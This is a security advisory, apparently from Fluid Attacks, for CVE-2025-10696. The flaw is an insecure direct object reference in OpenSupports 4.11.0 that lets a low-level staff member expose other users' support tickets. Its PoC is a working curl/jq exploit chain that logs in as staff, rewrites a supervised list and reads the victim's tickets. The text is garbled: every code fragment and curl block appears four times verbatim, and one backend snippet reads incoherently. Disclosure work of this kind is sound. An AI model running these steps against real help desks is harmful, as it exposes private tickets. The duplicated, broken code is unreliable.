

Advisories

OpenSupports 4.11.0 — Insecure Direct Object Reference in supervised list

7,1

High

Discovered by

Cristian Vargas

Offensive Team, Fluid Attacks

Summary

Full name

OpenSupports 4.11.0 — IDOR in supervised list enables cross-user ticket disclosure

Code name

stratovarius

State

Public

Release date

3 de out. de 2025

Affected product

OpenSupports

Vendor

OpenSupports

Affected version(s)

4.11.0

Vulnerability name

Insecure object reference

Vulnerability type

013. Insecure object reference

Remotely exploitable

Yes

CVSS v4.0 vector string

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CVSS v4.0 base score

7.1

Exploit available

Yes

CVE ID(s)

CVE-2025-10696

Description

OpenSupports exposes an endpoint that allows the list of 'supervised users' for any account to be edited, but it does not validate whether the actor is the owner of that list. A Level 1 staff member can modify the supervision relationship of a third party (the target user), who can then view the tickets of the added 'supervised' users. This breaks the authorization model and filters the content of other users' tickets.

Vulnerability

Relevant fragments from the backend (server):

Edit list without ownership (server/controllers/user/edit-supervised-list.php):
return [ 'permission' => 'staff_1', ... ] // handler(): assigns sharedUserList of the specified user without checking ownership
return [ 'permission' => 'staff_1', ... ] // handler(): assigns sharedUserList of the specified user without checking ownership
return [ 'permission' => 'staff_1', ... ] // handler(): assigns sharedUserList of the specified user without checking ownership
return [ 'permission' => 'staff_1', ... ] // handler(): assigns sharedUserList of the specified user without checking ownership

Secure pattern for comparison (server/controllers/staff/get-tickets.php):
if(Controller::isStaffLogged()) throw new RequestException(ERRORS::NO_PERMISSION); array_push($authors, ['id' => $supervised, 'isStaff' => 0]);
if(Controller::isStaffLogged()) throw new RequestException(ERRORS::NO_PERMISSION); array_push($authors, ['id' => $supervised, 'isStaff' => 0]);
if(Controller::isStaffLogged()) throw new RequestException(ERRORS::NO_PERMISSION); array_push($authors, ['id' => $supervised, 'isStaff' => 0]);
if(Controller::isStaffLogged()) throw new RequestException(ERRORS::NO_PERMISSION); array_push($authors, ['id' => $supervised, 'isStaff' => 0]);

Author filter (server/controllers/ticket/search.php):

if($author['isStaff']) { ticket.author_staff_id = ... } else { ticket.author_id = ... }

if($author['isStaff']) { ticket.author_staff_id = ... } else { ticket.author_id = ... }

if($author['isStaff']) { ticket.author_staff_id = ... } else { ticket.author_id = ... }

if($author['isStaff']) { ticket.author_staff_id = ... } else { ticket.author_id = ... }

Together, these pieces allow a staff_1 to impose external supervisory relationships and the resulting “supervisor” user to list tickets for victims.

PoC

curl -c staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d 'staff=1' -d 'email=staff2@yopmail.com' -d 'password=Test1234@' | tee staff2_login.json
export S_UID=$(jq -r '.data.userId' staff2_login.json)
export S_TOK=$(jq -r '.data.token' staff2_login.json)

curl -c staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d 'staff=1' -d 'email=staff2@yopmail.com' -d 'password=Test1234@' | tee staff2_login.json
export S_UID=$(jq -r '.data.userId' staff2_login.json)
export S_TOK=$(jq -r '.data.token' staff2_login.json)

curl -c staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d 'staff=1' -d 'email=staff2@yopmail.com' -d 'password=Test1234@' | tee staff2_login.json
export S_UID=$(jq -r '.data.userId' staff2_login.json)
export S_TOK=$(jq -r '.data.token' staff2_login.json)

curl -c staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d 'staff=1' -d 'email=staff2@yopmail.com' -d 'password=Test1234@' | tee staff2_login.json
export S_UID=$(jq -r '.data.userId' staff2_login.json)
export S_TOK=$(jq -r '.data.token' staff2_login.json)

Create Supervisor (S) and Target (T):

SUP_EMAIL="super$(openssl rand -hex 2)@yopmail.com"; TGT_EMAIL="target$(openssl rand -hex 2)@yopmail.com"; PASS='P@ssw0rd1!'
 curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Supervisor" -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_signup.json
curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Target" -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_signup.json
export SUP_ID=$(jq -r '.data.userId' sup_signup.json)
export TGT_ID=$(jq -r '.data.userId' tgt_signup.json)

SUP_EMAIL="super$(openssl rand -hex 2)@yopmail.com"; TGT_EMAIL="target$(openssl rand -hex 2)@yopmail.com"; PASS='P@ssw0rd1!'
 curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Supervisor" -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_signup.json
curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Target" -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_signup.json
export SUP_ID=$(jq -r '.data.userId' sup_signup.json)
export TGT_ID=$(jq -r '.data.userId' tgt_signup.json)

SUP_EMAIL="super$(openssl rand -hex 2)@yopmail.com"; TGT_EMAIL="target$(openssl rand -hex 2)@yopmail.com"; PASS='P@ssw0rd1!'
 curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Supervisor" -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_signup.json
curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Target" -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_signup.json
export SUP_ID=$(jq -r '.data.userId' sup_signup.json)
export TGT_ID=$(jq -r '.data.userId' tgt_signup.json)

SUP_EMAIL="super$(openssl rand -hex 2)@yopmail.com"; TGT_EMAIL="target$(openssl rand -hex 2)@yopmail.com"; PASS='P@ssw0rd1!'
 curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Supervisor" -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_signup.json
curl -sS -X POST 'http://localhost:5543/api/user/signup' \
  -d "name=Target" -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_signup.json
export SUP_ID=$(jq -r '.data.userId' sup_signup.json)
export TGT_ID=$(jq -r '.data.userId' tgt_signup.json)

curl -c tgt.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_login.json
export T_UID=$(jq -r '.data.userId' tgt_login.json)
export T_TOK=$(jq -r '.data.token' tgt_login.json)
TITLE="IDOR-$(openssl rand -hex 2)"
curl -b tgt.cookies -sS -X POST \
  'http://localhost:5543/api/ticket/create' \
  -d "csrf_userid=$T_UID" -d "csrf_token=$T_TOK" \
  -d "title=$TITLE" -d 'content=from target' -d 'departmentId=1' -d 'language=en'

curl -c tgt.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_login.json
export T_UID=$(jq -r '.data.userId' tgt_login.json)
export T_TOK=$(jq -r '.data.token' tgt_login.json)
TITLE="IDOR-$(openssl rand -hex 2)"
curl -b tgt.cookies -sS -X POST \
  'http://localhost:5543/api/ticket/create' \
  -d "csrf_userid=$T_UID" -d "csrf_token=$T_TOK" \
  -d "title=$TITLE" -d 'content=from target' -d 'departmentId=1' -d 'language=en'

curl -c tgt.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_login.json
export T_UID=$(jq -r '.data.userId' tgt_login.json)
export T_TOK=$(jq -r '.data.token' tgt_login.json)
TITLE="IDOR-$(openssl rand -hex 2)"
curl -b tgt.cookies -sS -X POST \
  'http://localhost:5543/api/ticket/create' \
  -d "csrf_userid=$T_UID" -d "csrf_token=$T_TOK" \
  -d "title=$TITLE" -d 'content=from target' -d 'departmentId=1' -d 'language=en'

curl -c tgt.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$TGT_EMAIL" -d "password=$PASS" | tee tgt_login.json
export T_UID=$(jq -r '.data.userId' tgt_login.json)
export T_TOK=$(jq -r '.data.token' tgt_login.json)
TITLE="IDOR-$(openssl rand -hex 2)"
curl -b tgt.cookies -sS -X POST \
  'http://localhost:5543/api/ticket/create' \
  -d "csrf_userid=$T_UID" -d "csrf_token=$T_TOK" \
  -d "title=$TITLE" -d 'content=from target' -d 'departmentId=1' -d 'language=en'

IDOR: staff2 assigns S the “supervised” T:

curl -b staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/edit-supervised-list' \
  -d "csrf_userid=$S_UID" -d "csrf_token=$S_TOK" \
  -d "userId=$SUP_ID" \
  -d "userIdList=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')"

curl -b staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/edit-supervised-list' \
  -d "csrf_userid=$S_UID" -d "csrf_token=$S_TOK" \
  -d "userId=$SUP_ID" \
  -d "userIdList=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')"

curl -b staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/edit-supervised-list' \
  -d "csrf_userid=$S_UID" -d "csrf_token=$S_TOK" \
  -d "userId=$SUP_ID" \
  -d "userIdList=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')"

curl -b staff2.cookies -sS -X POST \
  'http://localhost:5543/api/user/edit-supervised-list' \
  -d "csrf_userid=$S_UID" -d "csrf_token=$S_TOK" \
  -d "userId=$SUP_ID" \
  -d "userIdList=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')"

curl -c sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_login.json
export U_UID=$(jq -r '.data.userId' sup_login.json)
export U_TOK=$(jq -r '.data.token' sup_login.json)
curl -b sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/get-supervised-tickets' \
  -d "csrf_userid=$U_UID" -d "csrf_token=$U_TOK" \
  -d "supervisedUsers=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')" \
  -d 'showOwnTickets=0' -d 'page=1' -d 'pageSize=10' | jq '.data.tickets[].title'

curl -c sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_login.json
export U_UID=$(jq -r '.data.userId' sup_login.json)
export U_TOK=$(jq -r '.data.token' sup_login.json)
curl -b sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/get-supervised-tickets' \
  -d "csrf_userid=$U_UID" -d "csrf_token=$U_TOK" \
  -d "supervisedUsers=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')" \
  -d 'showOwnTickets=0' -d 'page=1' -d 'pageSize=10' | jq '.data.tickets[].title'

curl -c sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_login.json
export U_UID=$(jq -r '.data.userId' sup_login.json)
export U_TOK=$(jq -r '.data.token' sup_login.json)
curl -b sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/get-supervised-tickets' \
  -d "csrf_userid=$U_UID" -d "csrf_token=$U_TOK" \
  -d "supervisedUsers=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')" \
  -d 'showOwnTickets=0' -d 'page=1' -d 'pageSize=10' | jq '.data.tickets[].title'

curl -c sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/login' \
  -d "email=$SUP_EMAIL" -d "password=$PASS" | tee sup_login.json
export U_UID=$(jq -r '.data.userId' sup_login.json)
export U_TOK=$(jq -r '.data.token' sup_login.json)
curl -b sup.cookies -sS -X POST \
  'http://localhost:5543/api/user/get-supervised-tickets' \
  -d "csrf_userid=$U_UID" -d "csrf_token=$U_TOK" \
  -d "supervisedUsers=$(jq -c -n --arg id "$TGT_ID" '[($id|tonumber)]')" \
  -d 'showOwnTickets=0' -d 'page=1' -d 'pageSize=10' | jq '.data.tickets[].title'

Evidence of Exploitation

Our security policy

We have reserved the ID CVE-2025-10696 to refer to this issue from now on.

Disclosure policy

System Information

OpenSupports
Version 4.11.0
Operating System: Any

References

Github Repository: https://github.com/opensupports/opensupports
Security: https://github.com/opensupports/opensupports/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Cristian Vargas from Fluid Attacks' Offensive Team.

Timeline



8 de set. de 2025

Vulnerability discovered



18 de set. de 2025

Vendor contacted



3 de out. de 2025

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Consulta IA sobre Fluid Attacks